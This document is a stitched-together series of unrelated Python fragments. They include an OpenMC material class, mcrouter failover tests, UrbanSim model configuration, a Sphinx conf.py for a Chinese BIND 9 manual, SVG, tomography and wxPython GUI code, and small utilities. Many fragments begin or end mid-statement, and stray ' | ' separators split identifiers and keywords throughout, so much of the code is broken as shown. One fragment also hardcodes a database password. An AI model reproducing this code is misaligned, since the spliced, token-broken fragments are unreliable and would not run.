self.name = name
self._density = None
self._density_units = ''
# A dictionary of Nuclides
# Keys - Nuclide names
# Values - tuple (nuclide, percent, percent type)
self._nuclides = {}
# A dictionary of Elements
# Keys - Element names
# Values - tuple (element, percent, percent type)
self._elements = {}
# If specified, a list of tuples of (table name, xs identifier)
self._sab = []
# If true, the material will be initialized as distributed
self._convert_to_distrib_comps = False
# If specified, this file will be used instead of composition values
self._distrib_otf_file = None
@property
def id(self):
return self._id
@property
def name(self):
return self._name
@property
def density(self):
return self._density
@property
def density_units(self):
return self._density_units
@property
def convert_to_distrib_comps(self):
return self._convert_to_distrib_comps
@property
def distrib_otf_file(self):
return self._distrib_otf_file
@id.setter
def id(self, material_id):
global AUTO_MATERIAL_ID, MATERIAL_IDS
# If the Material already has an ID, remove it from global list
if hasattr(self, '_id') and self._id is not None:
MATERIAL_IDS.remove(self._id)
if material_id is None:
self._id = AUTO_MATERIAL_ID
MATERIAL_IDS.append(AUTO_MATERIAL_ID)
AUTO_MATERIAL_ID += 1
else:
check_type('material ID', material_id, Integral)
if material_id in MATERIAL_IDS:
msg = 'Unable to set Material ID to {0} since a Material with ' \
'this ID was already initialized'.format(material_id)
raise ValueError(msg)
check_greater_than('material ID', material_id, 0)
self._id = material_id
MATERIAL_IDS.append(material_id)
@name.setter
def name(self, name):
check_type('name for Material ID={0}'.format(self._id),
name, basestring)
self._name = name
def set_density(self, units, density=NO_DENSITY):
"""Set the density of the material
Parameters
----------
units : str
Physical units of density
density : float, optional
Value of the density. Must be specified unless units is given as
'sum'.
"""
check_type('the density for Material ID={0}'.format(self._id),
density, Real)
check_value('density units', units, DENSITY_UNITS)
if density == NO_DENSITY and units is not 'sum':
msg = 'Unable to set the density Material ID={0} ' \
'because a density must be set when not using ' \
'sum unit'.format(self._id)
raise ValueError(msg)
self._density = density
self._density_units = units
@distrib_otf_file.setter
def distrib_otf_file(self, filename):
# TODO: remove this when distributed materials are merged
warnings.warn('This feature is not yet implemented in a release '
'version of openmc')
if not isinstance(filename, basestring) and filename is not None:
msg = 'Unable to add OTF material file to Material ID={0} with a ' \
'non-string name {1}'.format(self._id, filename)
raise ValueError(msg)
self._distrib_otf_file = filename
@convert_to_distrib_comps.setter
def convert_to_distrib_comps(self):
# TODO: remove this when distributed materials are merged
warnings.warn('This feature is not yet implemented in a release '
'version of openmc')
self._convert_to_distrib_comps = True
def add_nuclide(self, nuclide, per | cent, percent_type='ao'):
"""Add a nuclide to the material
Parameters
----------
nuclide : str or openmc.nuclide.Nuclide
Nuclide to add
percent : float
Atom or weight percent
percent_type : str
'ao' for atom percent and 'wo' for weight percent
"""
if not isinstance(nuclide, (openmc.Nuclide, str)):
| msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'non-Nuclide value {1}'.format(self._id, nuclide)
raise ValueError(msg)
elif not isinstance(percent, Real):
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'non-floating point value {1}'.format(self._id, percent)
raise ValueError(msg)
elif percent_type not in ['ao', 'wo', 'at/g-cm']:
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'percent type {1}'.format(self._id, percent_type)
raise ValueError(msg)
if isinstance(nuclide, openmc.Nuclide):
# Copy this Nuclide to separate it from the Nuclide in
# other Materials
nuclide = deepcopy(nuclide)
else:
nuclide = openmc.Nuclide(nuclide)
self._nuclides[nuclide._name] = (nuclide, percent, percent_type)
def remove_nuclide(self, nuclide):
"""Remove a nuclide from the material
Parameters
----------
nuclide : openmc.nuclide.Nuclide
Nuclide to remove
"""
if not isinstance(nuclide, openmc.Nuclide):
msg = 'Unable to remove a Nuclide {0} in Material ID={1} ' \
'since it is not a Nuclide'.format(self._id, nuclide)
raise ValueError(msg)
# If the Material contains the Nuclide, delete it
if nuclide._name in self._nuclides:
del self._nuclides[nuclide._name]
def add_element(self, element, percent, percent_type='ao'):
"""Add a natural element to the material
Parameters
----------
element : openmc.element.Element
Element to add
percent : float
Atom or weight percent
percent_type : str
'ao' for atom percent and 'wo' for weight percent
"""
if not isinstance(element, openmc.Element):
msg = 'Unable to add an Element to Material ID={0} with a ' \
'non-Element value {1}'.format(self._id, element)
raise ValueError(msg)
if not isinstance( |
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_dev_null(self):
mcr = self.get_mcrouter()
# finally setup is done
mcr.set("good:key", "should_be_set")
mcr.set("key", "should_be_set_wild")
mcr.set("null:key", "should_not_be_set")
mcgood_val = self.mc_good.get("good:key")
mcnull_val = self.mc_wild.get("null:key")
mcwild_val = self.mc_wild.get("key")
self.assertEqual(mcgood_val, "should_be_set")
self.assertEqual(mcnull_val, None)
self.assertEqual(mcwild_val, "should_be_set_wild")
self.assertEqual(mcr.delete("null:key2"), None)
self.assertEqual(int(mcr.stats('ods')['dev_null_requests']), 2)
class TestMigratedPools(McrouterTestCase):
config = './mcrouter/test/test_migrated_pools.json'
extra_args = []
def setUp(self):
self.wild_new = self.add_server(Memcached())
self.wild_old = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(
self.config, extra_args=self.extra_args,
replace_map={"START_TIME": (int(time.time()) + 2)})
def test_migrated_pools(self):
mcr = self.get_mcrouter()
#set keys that should be deleted in later phases
for phase in range(1, 5):
self.wild_old.set("get-key-" + str(phase), str(phase))
self.wild_new.set("get-key-" + str(phase), str(phase * 100))
# first we are in the old domain m | ake sure all ops go to
| # the old host only
self.assertEqual(mcr.get("get-key-1"), str(1))
mcr.set("set-key-1", str(42))
self.assertEqual(self.wild_old.get("set-key-1"), str(42))
self.assertEqual(self.wild_new.get("set-key-1"), None)
mcr.delete("get-key-1")
#make sure the delete went to old but not new
self.assertEqual(self.wild_old.get("get-key-1"), None)
self.assertEqual(self.wild_new.get("get-key-1"), str(100))
#next phase
time.sleep(2)
# gets/sets go to the old place
self.assertEqual(mcr.get("get-key-2"), str(2))
mcr.set("set-key-2", str(4242))
self.assertEqual(self.wild_old.get("set-key-2"), str(4242))
self.assertEqual(self.wild_new.get("set-key-2"), None)
mcr.delete("get-key-2")
#make sure the delete went to both places
self.assertEqual(self.wild_old.get("get-key-2"), None)
self.assertEqual(self.wild_new.get("get-key-2"), None)
#next phase
time.sleep(2)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-3"), str(300))
mcr.set("set-key-3", str(424242))
self.assertEqual(self.wild_old.get("set-key-3"), None)
self.assertEqual(self.wild_new.get("set-key-3"), str(424242))
mcr.delete("get-key-3")
#make sure the delete went to both places
self.assertEqual(self.wild_old.get("get-key-3"), None)
self.assertEqual(self.wild_new.get("get-key-3"), None)
#next phase
time.sleep(2)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-4"), str(400))
mcr.set("set-key-4", str(42424242))
self.assertEqual(self.wild_old.get("set-key-4"), None)
self.assertEqual(self.wild_new.get("set-key-4"), str(42424242))
mcr.delete("get-key-4")
#make sure the delete went to the new place only
self.assertEqual(self.wild_old.get("get-key-4"), str(4))
self.assertEqual(self.wild_new.get("get-key-4"), None)
class TestMigratedPoolsFailover(McrouterTestCase):
config = './mcrouter/test/test_migrated_pools_failover.json'
extra_args = []
def setUp(self):
self.a_new = self.add_server(Memcached())
self.a_old = self.add_server(Memcached())
self.b_new = self.add_server(Memcached())
self.b_old = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(
self.config, extra_args=self.extra_args,
replace_map={"START_TIME": (int(time.time()) + 2)})
def test_migrated_pools_failover(self):
mcr = self.get_mcrouter()
#set keys that should be deleted in later phases
for phase in range(1, 5):
self.a_old.set("get-key-" + str(phase), str(phase))
self.a_new.set("get-key-" + str(phase), str(phase * 10))
self.b_old.set("get-key-" + str(phase), str(phase * 100))
self.b_new.set("get-key-" + str(phase), str(phase * 1000))
# first we are in the old domain make sure all ops go to
# the old host only
self.assertEqual(mcr.get("get-key-1"), str(1))
mcr.set("set-key-1", str(42))
self.assertEqual(self.a_old.get("set-key-1"), str(42))
self.a_old.terminate()
self.assertEqual(mcr.get("get-key-1"), str(100))
mcr.set("set-key-1", str(42))
self.assertEqual(self.b_old.get("set-key-1"), str(42))
#next phase
time.sleep(2.5)
self.assertEqual(mcr.get("get-key-2"), str(200))
mcr.set("set-key-2", str(42))
self.assertEqual(self.b_old.get("set-key-2"), str(42))
#next phase
time.sleep(2.5)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-3"), str(30))
mcr.set("set-key-3", str(424242))
self.assertEqual(self.a_new.get("set-key-3"), str(424242))
self.a_new.terminate()
self.assertEqual(mcr.get("get-key-3"), str(3000))
class TestDuplicateServers(McrouterTestCase):
config = './mcrouter/test/test_duplicate_servers.json'
extra_args = []
def setUp(self):
self.wildcard = self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(
self.config, '/a/a/', extra_args=self.extra_args)
def test_duplicate_servers(self):
mcr = self.get_mcrouter()
stats = mcr.stats('servers')
# Check that only one proxy destination connection is made
# for all the duplicate servers
self.assertEqual(1, len(stats))
# Hardcoding default server timeout
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-1000'
self.assertTrue(key in stats)
class TestDuplicateServersDiffTimeouts(McrouterTestCase):
config = './mcrouter/test/test_duplicate_servers_difftimeouts.json'
extra_args = []
def setUp(self):
self.wildcard = self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(
self.config, '/a/a/', extra_args=self.extra_args)
def test_duplicate_servers_difftimeouts(self):
mcr = self.get_mcrouter()
stats = mcr.stats('servers')
# Check that only two proxy destination connections are made
# for all the duplicate servers in pools with diff timeout
self.assertEqual(2, len(stats))
# Hardcoding default server timeout
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-1000'
self.assertTrue(key in stats)
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-2000'
self.assertTrue(key in stats)
class TestSamePoolFailover(McrouterTestCase):
config = './mcrouter/test/test_same_pool_failover.json'
extra_args = []
def setUp(self):
self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_same_pool_failover(self):
mcr = self.get_mcrouter()
self.assertEqual(mcr.get('foobar'), None)
self.assertTrue(mcr.set('foobar', 'bizbang'))
self.assertEqual(mcr.get('foobar'), 'bizbang')
mcr.delete('foobar')
self.assertEqual(mcr.get('foobar'), None)
class TestGetFailover(McrouterTestCase):
config = './mcrouter/test/test_get_failover.json'
extra_args = []
def setUp(self):
self.gut = self.add_server(Memcached())
self.wildcard = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extr |
"opus_core.bhhh_mnl_estimation",
"sampler":"opus_core.samplers.weighted_sampler",
"sample_size_locations":30,
"weights_for_estimation_string":"urbansim.zone.number_of_non_home_based_jobs",
"compute_capacity_flag":True,
"capacity_string":"urbansim.zone.number_of_non_home_based_jobs",
"number_of_units_string":"urbansim.zone.number_of_non_home_based_jobs",
}
run_configuration['models_configuration']['workplace_choice_model_for_resident']= wlcm_model_configuration
my_controller_configuration = {
'household_person_consistency_keeper':{
"import": {"psrc.models.persons_consistency_keeper_model":"PersonDatasetConsistencyKeeperModel"},
"init": {
"name": "PersonDatasetConsistencyKeeperModel",
"arguments": {},
},
"run": {
"arguments": {"household_set": "household",
"person_set":"person",
"expand_person_set":True,
}
},
},
# This isn't necessary since we don't explicitly match person to job, but number of jobs and persons should match at zone level
# 'job_person_consistency_keeper':{
# "import": {"psrc.models.persons_consistency_keeper_model":"PersonDatasetConsistencyKeeperModel"},
# "init": {
# "name": "PersonDatasetConsistencyKeeperModel",
# "arguments": {},
# },
# "run": {
# "arguments": {"job_set": "job",
# "person_set":"person",
# "expand_person_set":False,
# }
# },
# },
'workplace_choice_model_for_resident': {
"import": {"urbansim.models.agent_location_choice_model":"AgentLocationChoiceModel"},
"init": {
"name": "AgentLocationChoiceModel",
"arguments": {
"location_set":"zone",
"model_name":"'Non-home-based Workplace Choice Model for residents'",
"short_name":"'NHBWCM'",
"choices":"'urbansim.lottery_choices'",
"submodel_string":"'psrc.person.household_income'",
# "filter": "'psrc.job.is_untaken_non_home_based_job'",
"location_id_string":"'psrc.person.zone_id'",#"'psrc.person.workplace_zone_id'",
"run_config":"models_configuration['workplace_choice_model_for_resident']",
"estimate_config":"models_configuration['workplace_choice_model_for_resident']"
}},
"prepare_for_run": {
"name": "prepare_for_run",
"arguments": {"specification_storage": "base_cache_storage", #"models_configuration['specification_storage']",
"specification_table": "'workplace_choice_model_for_resident_specification'",
"coefficients_storage": "base_cache_storage", #"models_configuration['coefficients_storage']",
"coefficients_table": "'workplace_choice_model_for_resident_coefficients'",
},
"output": "(specification, coefficients)"
},
"run": {
"arguments": {"specification": "specification",
"coefficients":"coefficients",
"agent_set": "person",
"agents_index": None,
"agents_filter":"'psrc.person.is_non_home_base | d_worker_without_workplace_zone'",
"data_objects": "datasets",
"chunk_specification":"{'records_per | _chunk':5000}",
"debuglevel": run_configuration['debuglevel'] }
},
"prepare_for_estimate": {
"name": "prepare_for_estimate",
"arguments": {
"agent_set":"person",
"join_datasets": "False",
"agents_for_estimation_storage": "base_cache_storage",
"agents_for_estimation_table": "'workers_for_estimation'",
"filter":None,
"data_objects": "datasets"
},
"output": "(specification, index)"
},
"estimate": {
"arguments": {
"specification": "specification",
"agent_set": "person",
"agents_index": "index",
"data_objects": "datasets",
"debuglevel": run_configuration['debuglevel']},
"output": "(coefficients, dummy)"
},
},
"job_change_model":{
"import": {"urbansim.models.agent_relocation_model":
"AgentRelocationModel"
},
"init": {
"name": "AgentRelocationModel",
"arguments": {"choices":"opus_core.random_choices",
"probabilities":"psrc.job_change_probabilities",
"location_id_name":"'psrc.person.workplace_zone_id'",
"model_name":"job change model",
"debuglevel": config['debuglevel']
},
},
"prepare_for_run": {
"name": "prepare_for_run",
"arguments": {"what": "'person'", "rate_storage": "base_cache_storage",
"rate_table": "'annual_job_change_rates_for_workers'"},
"output": "jcm_resources"
},
"run": {
"arguments": {"agent_set": "person", "resources": "jcm_resources"},
"output": "jcm_index"
}
}
}
my_controller_configuration["workplace_choice_model_for_immigrant"] = copy.deepcopy(my_controller_configuration["workplace_choice_model_for_resident"])
my_controller_configuration["workplace_choice_model_for_immigrant"]["init"]["arguments"]["model_name"] = "'Non-home-based Workplace Choice Model for immigrants'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["prepare_for_run"]["arguments"]["specification_table"] = "'workplace_choice_model_for_immigrant_specification'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["prepare_for_run"]["arguments"]["coefficients_table"] = "'workplace_choice_model_for_immigrant_coefficients'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["run"]["arguments"]["agents_filter"] = "'psrc.person.is_immigrant_worker_without_workplace_zone'"
my_controller_configuration["home_based_workplace_choice_model"] = copy.deepcopy(my_controller_configuration["workplace_choice_model_for_resident"])
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["filter"] = "'psrc.job.is_untaken_home_based_job'"
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["model_name"] = "'Home-based Work Choice Model'"
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["short_name"] = "'HBWCM'"
my_controller_configuration["home_based_workplace_choice_model"]["prepare_for_run"]["arguments"]["specification_table"] = "'home_based_workplace_choice_model_specification'"
my_controller_configuration["home_based_workplace_choice_model"]["prepare_for_run"]["arguments"]["coefficients_table"] = "'home_based_workplace_choice_model_coefficients'"
my_controller_configuration["home_based_workplace_choice_model"]["run"]["arguments"]["agents_filter"] = "'psrc.person.is_home_based_worker_without_job'"
my_controller_configuration["home_based_workplace_choice_model"]["run"]["arguments"]["chunk_specification"] = "{'nchunks':1}"
my_controller_configuration["worker_specific_household_location_choice_model"] = copy.deepcopy(run_configuration['models_configuration']["household_location_choice_model"]["controller"])
my_c |
############################################################################
# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, you can obtain one at https://mozilla.org/MPL/2.0/.
#
# See the COPYRIGHT file distributed with this work for additional
# information regarding copyright ownership.
############################################################################
# flake8: noqa: E501
from typing import List, Tuple
from docutils import nodes
from docutils.nodes import Node, system_message
from docutils.parsers.rst import roles
from sphinx import addnodes
from sphinx.util.docutils import ReferenceRole
GITLAB_BASE_URL = 'https://gitlab.isc.org/isc-projects/bind9/-/'
# Custom Sphinx role enabling automatic hyperlinking to GitLab issues/MRs.
class GitLabRefRole(ReferenceRole):
def __init__(self, base_url: str) -> None:
self.base_url = base_url
super().__init__()
def run(self) -> Tuple[List[Node], List[system_message]]:
gl_identifier = '[GL %s]' % self.target
target_id = 'index-%s' % self.env.new_serialno('index')
entries = [('single', 'GitLab; ' + gl_identifier, target_id, '', None)]
index = addnodes.index(entries=entries)
target = nodes.target('', '', ids=[target_id])
self.inliner.document.note_explicit_target(target)
try:
refuri = self.build_uri()
reference = nodes.reference('', '', internal=False, refuri=refuri,
classes=['gl'])
if self.has_explicit_title:
reference += nodes.strong(self.title, self.title)
else:
reference += nodes.strong(gl_identifier, gl_identifier)
except ValueError:
error_text = 'invalid GitLab identifier %s' % self.target
msg = self.inliner.reporter.error(error_text, line=self.lineno)
prb = self.inliner.problematic(self.rawtext, self.rawtext, msg)
return [prb], [msg]
return [index, target, reference], []
def build_uri(self):
if self.target[0] == '#':
return self.base_url + 'issues/%d' % int(self.target[1:])
if self.target[0] == '!':
return self.base_url + 'merge_requests/%d' % int(self.target[1:])
raise ValueError
def setup(_):
roles.register_local_role('gl', GitLabRefRole(GITLAB_BASE_URL))
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'BIND 9 管理员参考手册'
copyright = u'2021, Internet Systems Consortium'
author = u"Internet Systems Consortium \\and 翻译: sunguonian@yahoo.com"
# The full version, including alpha/beta/rc tags
release = 'BIND 9.16.18(稳定版)'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'zh_CN'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
'_build',
'Thumbs.db',
'.DS_Store',
'*.grammar.rst',
'*.zoneopts.rst',
'catz.rst',
'dlz.rst',
'dnssec.rst',
'dyndb.rst',
'logging-cattegories.rst',
'managed-keys.rst',
'pkcs11.rst',
'plugins.rst'
]
# The master toctree document.
master_doc = 'index'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
#html_theme = 'alabaster'
html_theme = 'sphinx_r | td_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
latex_engine = 'xelatex'
latex_elements = {
'fontpkg': r'''
\setmainfont{Source Han Serif CN:style=Regular}
\setsansfont{Source Han Sans | CN Medium:style=Medium,Regular}
\setmonofont{Source Han Sans CN:style=Regular}
\setCJKfamilyfont{song}{Source Han Serif CN:style=Regular}
\setCJKfamilyfont{heiti}{Source Han Sans CN:style=Regular}
''',
'pointsize': '11pt',
'preamble': r'\input{../mystyle.tex.txt}'
}
latex_documents = [
(master_doc, 'Bv9ARM.tex', u'BIND 9管理员参考手册', author, 'manual'),
]
latex_logo = "isc-logo.pdf"
|
from RGT.XML.SVG.basicSvgNode import BasicSvgNode
from RGT.XML.SVG.Attribs.conditionalProcessingAttributes import ConditionalProcessingAttributes
from RGT.XML.SVG.Attribs.xlinkAttributes import XlinkAttributes
from RGT.XML.SVG.Attribs.animationTimingAttributes import AnimationTimingAttributes
class BaseAnimationNode(BasicSvgNode):
ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED = 'externalResourcesRequired'
def __init__(self, ownerDoc, tagName):
BasicSvgNode.__init__(self, ownerDoc, tagName)
ConditionalProcessingAttributes.__init__(self)
XlinkAttributes.__init__(self)
AnimationTimingAttributes.__init__(self)
self._allowedSvgChildNodes.update(self.SVG_GROUP_DESCRIPTIVE_ELEMENTS)
def setExternalResourcesRequired(self, data):
allowedValues = ['true', 'false']
if data is not None:
if data not in allowedValues:
values = ''
for value in allowedValues:
values += value + ', '
values = values[0: len(values) - 2]
rai | se ValueError('Value not allowed, only ' + values + 'are allowed')
else:
self._setNodeAttribute(self.ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED, data)
def getExternalResourcesRequired(self):
node = self._getNodeAttribute(self.ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED | )
if node is not None:
return node.nodeValue
return None
|
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 11 11:34:27 2015
@author: JonasAdler
"""
# Imports for common Python 2/3 codebase
from __future__ import print_function, division, absolute_import
from future import standard_library
standard_library.install_aliases()
# External
import numpy as np
# Internal
import odl
from tomography_helper import ForwardProjector
def SplitBregmanReconstruct(A, Phi, x, rhs, la, mu, iterations=1, N=1):
""" Reconstruct with split Bregman.
Parameters
----------
A : `odl.Operator`
Pojector
Phi : `odl.Operator`
Sparsifying transform
x : ``A.domain`` element
"""
Atf = A.adjoint(rhs)
b = Phi.range.zero()
d = Phi.range.zero()
op = mu * (A.adjoint * A) + la * (Phi.adjoint * Phi)
fig = None
for i in range(iterations):
for n in range(N):
# Solve tomography part iteratively
rhs = mu * Atf + la * Phi.adjoint(d-b)
odl.solvers.conjugate_gradient(op, x, rhs, niter=2)
# d = sign(Phi(x)+b) * max(|Phi(x)+b|-la^-1,0)
s = Phi(x) + b
d = s.ufunc.sign() * (s.ufunc.absolute().
| ufunc.add(-1.0/la).
ufunc.maximum(0.0))
b = b + Phi(x) - d
fig = x.show(clim=[0.0, 1.1], fig=fig, show=True)
n = 100
# Create spaces
d = odl.uniform_discr([0, 0], [1, 1], [n, n])
ran = | odl.uniform_discr([0, 0], [1, np.pi], [np.ceil(np.sqrt(2) * n), n])
# Create phantom
phantom = odl.util.shepp_logan(d, modified=True)
# These are tuing parameters in the algorithm
la = 500. / n # Relaxation
mu = 20000. / n # Data fidelity
# Create projector
Phi = odl.trafos.WaveletTransform(d, nscales=3, wbasis='db2', mode='per')
A = ForwardProjector(d, ran)
# Create data
rhs = A(phantom)
# Add noise
rhs.ufunc.add(np.random.rand(ran.size)*0.05, out=rhs)
# Reconstruct
x = d.zero()
#odl.solvers.conjugate_gradient_normal(A, x, rhs, niter=7)
SplitBregmanReconstruct(A, Phi, x, rhs, la, mu, 100, 1)
x.show()
|
import re
class CommandError(Exception):
pass
class BaseCommand():
"""
Base command, this will accept and handle some generic features of all commands.
Like error handling, argument retrieving / checking
"""
def __init__(self, args):
"""
Initialize the class
"""
self._args = args
def arg(self, key):
"""
Retrieve a single argument
"""
return self._args.get(key)
def args(self, *keys):
"""
Retri | eve a set of argument
"""
if keys:
return [self.arg(k) for k in keys]
else:
return self._args
def value(self, key):
"""
Retrieve a single argument
"""
key = '<{0}>'.format(key)
return self.arg(key)
def option(self, key, value=None):
"""
Retrieve a single argument
"""
key = '--'+key
if value:
return self.arg(key) == value
return self.arg(key)
def | args_context(self):
"""
Convert all options and values into a context usable by the template parser
"""
context = dict(options={}, values={})
for key, value in self.args().items():
expressions = {
'options': r'--(.*)',
'values': r'<(.*)>',
}
for group, expression in expressions.items():
matches = re.search(expression, key)
if matches:
context[matches.group(1).replace('-', '_')] = value
return context |
"""
Configuration for a project.
"""
rails = {
'models.engine': 'sql | alchemy',
'models.db.type': 'postgres',
'models.db.user': 'rails',
'models.db.password': 'rails', |
'views.engine': 'jinja',
}
|
import sys
from contextlib import contextmanager
from StringIO i | mport StringIO
@contextmanager
def string_stdout():
output | = StringIO()
sys.stdout = output
yield output
sys.stdout = sys.__stdout__
|
##########################################################################
#This file is part of WTFramework.
#
# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from wtframework.wtf.config import ConfigReader, ConfigFileReadError
import unittest
class TestConfigReader(unittest.TestCase):
def test_get_returns_string_config_value(self):
'''
Test config value returned is expected value
'''
config = ConfigReader("tests/TestConfigReaderData")
value = config.get("string_test")
self.assertEqual(value, "some value", "Value did not match expected.")
def test_get_with_default_value(self):
"Test the get method returns value if available or the the default."
config = ConfigReader("tests/TestConfigReaderData")
self.assertEqual("some value", config.get("string_test", "default value"))
self.assertEqual("default value", config.get("i_dont_exist", "default value"))
def test_get_handles_namespaced_keys(self):
'''
Test ConfigReader works with namespaced keys like, path.to.element
'''
config = ConfigReader("tests/TestConfigReaderData")
value = config.get("bill-to.given")
self.assertEqual(value, "Chris", "Value did not match expected.")
def test_get_handles_yaml_arrays(self):
'''
Test ConfigReader works with YAML arrays.
'''
config = ConfigReader("tests/TestConfigReaderData")
self.assertEqual("dogs", config.get("list_test")[0])
self.assertEqual("cats", config.get("list_test")[1])
self.assertEqual("badgers", config.get("list_test")[2])
def test_get_with_cascaded_config_files(self):
'''
Test Config reader loaded up wit | h multiple configs loads
the config preferences in order.
'''
config = ConfigReader("tests/TestConfig2;tests/TestConfig1")
# should take config from config1
self.assertEqual("hello", config.get("setting_from_config1"))
# this will take the config from config2, which has precedence.
self.assertEqual("beautiful", config.get("overwrite_setting"))
# this will take the setting form config2.
self.assertEqual("hi", config.get("setting_fr | om_config2"))
def test_get_with_missing_key_and_no_default(self):
"An error should be thrown if the key is missing and no default provided."
config = ConfigReader("tests/TestConfig2;tests/TestConfig1")
# should take config from config1
self.assertRaises(KeyError, config.get, "setting_that_doesnt_exist")
def test_specifying_bad_config_file(self):
"Test error is thrown when invalid config file is specified."
self.assertRaises(ConfigFileReadError, ConfigReader, "tests/TestConfig1,NOSUCHFILE")
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main() |
# -*- coding: utf-8 -*-
import os.path
import wx
from outwiker.core.system import getImagesDir
class SearchReplacePanel (wx.Panel):
def __init__(self, parent):
super(SearchReplacePanel, self).__init__(
parent,
style=wx.TAB_TRAVERSAL | wx.RAISED_BORDER)
self._controller = None
self._createGui()
self._bindEvents()
# Список элементов, относящихся к замене
self._replaceGui = [self._replaceLabel,
self._replaceText,
self._replaceBtn,
self._replaceAllBtn,
]
self.setReplaceGuiVisible(False)
def setController(self, controller):
self._controller = controller
@property
def searchTextCtrl(self):
return self._searchText
@property
def replaceTextCtrl(self):
return self._replaceText
@property
def resultLabel(self):
return self._resultLabel
def setReplaceGuiVisible(self, visible):
"""
Установить, нужно ли показывать элементы GUI для замены
"""
for item in self._replaceGui:
item.Show(visible)
self.Layout()
def _bindEvents(self):
self.Bind(wx.EVT_TEXT_ENTER, self.__onEnterPress, self._searchText)
self.Bind(wx.EVT_TEXT_ENTER, self.__onEnterPress, self._replaceText)
self.Bind(wx.EVT_TEXT, self.__onSearchTextChange, self._searchText)
self.Bind(wx.EVT_BUTTON, self.__onNextSearch, self._nextSearchBtn)
self.Bind(wx.EVT_BUTTON, self.__onPrevSearch, self._prevSearchBtn)
self.Bind(wx.EVT_BUTTON, self.__onReplace, self._replaceBtn)
self.Bind(wx.EVT_BUTTON, self.__onReplaceAll, self._replaceAllBtn)
self.Bind(wx.EVT_BUTTON, self.__onCloseClick, self._closeBtn)
for child in self.GetChildren():
child.Bind(wx.EVT_KEY_DOWN, self.__onKeyPressed)
def _createGui(self):
# Поле для ввода искомой фразы
self._searchText = wx.TextCtrl(self, -1, u"",
style=wx.TE_PROCESS_ENTER)
# Текст для замены
self._replaceText = wx.TextCtrl(self, -1, u"",
style=wx.TE_PROCESS_ENTER)
# Элементы интерфейса, связанные с поиском
self._findLabel = wx.StaticText(self, -1, _(u"Find what: "))
# Кнопка "Найти далее"
self._nextSearchBtn = wx.Button(self, -1, _(u"Next"))
# Кнопка "Найти выше"
self._prevSearchBtn = wx.Button(self, -1, _(u"Prev"))
# Метка с результатом поиска
self._resultLabel = wx.StaticText(self, -1, "")
self._resultLabel.SetMinSize((150, -1))
# Элементы интерфейса, связанные с заменой
self._replaceLabel = wx.StaticText(self, -1, _(u" | Replace with: "))
# Кнопка "Заменить"
self._replaceBtn = wx.Button(self, -1, _(u"Replace"))
# Кнопка "Заменить все"
self._replaceAllBtn = wx.Button(self, -1, _ | (u"Replace All"))
self._closeBtn = wx.BitmapButton(
self,
-1,
wx.Bitmap(os.path.join(getImagesDir(), "close-button.png"),
wx.BITMAP_TYPE_ANY))
self._layout()
def _layout(self):
self._mainSizer = wx.FlexGridSizer(cols=6)
self._mainSizer.AddGrowableCol(1)
# Элементы интерфейса для поиска
self._mainSizer.Add(self._findLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
